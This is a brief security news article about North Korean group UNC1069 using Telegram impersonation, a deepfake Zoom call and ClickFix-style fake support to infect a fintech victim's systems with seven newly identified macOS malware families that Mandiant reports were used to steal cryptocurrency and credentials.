North Korean hackers are deploying advanced social engineering tactics combined with never-before-seen macOS malware strains to siphon cryptocurrency assets. The operation leverages deepfake videos and the ClickFix method, tricking victims into executing malicious commands through fake technical support scenarios. Google's Mandiant incident responders identified seven distinct malware families during an investigation of a fintech breach attributed to the UNC1069 group.
The attack began on Telegram, where threat actors impersonated a crypto executive using a compromised account. After establishing trust, the victim was directed to a counterfeit Zoom page featuring an AI-generated video of another industry leader. The perpetrator feigned audio problems and provided a webpage containing malicious commands for either Windows or macOS. This technique mirrors previous campaigns linked to the BlueNoroff hacking collective.
Once triggered on macOS, the infection deployed a progression of sophisticated tools. WAVESHAPER functions as a persistent C++ backdoor communicating via HTTP, while HYPERCALL loads encrypted configurations and reflectively injects HIDDENCALL for interactive access. Additional payloads include SILENCELIFT, a minimal beacon, and DEEPBREATH, a Swift-based stealer that bypasses system privacy controls to plunder keychains, browser data, and notes.
SUGARLOADER and its component CHROMEPUSH establish persistence through launch daemons and masquerade as browser extensions to capture credentials and keystrokes. Most of these malware strains remain undetected by common antivirus engines. Mandiant notes this concentration of unique tools against a single target is highly atypical, indicating a deliberate effort to harvest maximum intelligence. This intelligence fuels both immediate cryptocurrency theft and future impersonation-based operations.
UNC1069 has consistently refined its victim selection, pivoting from Web3 entities in 2023 to broader financial infrastructure targets in the past year.
Read more...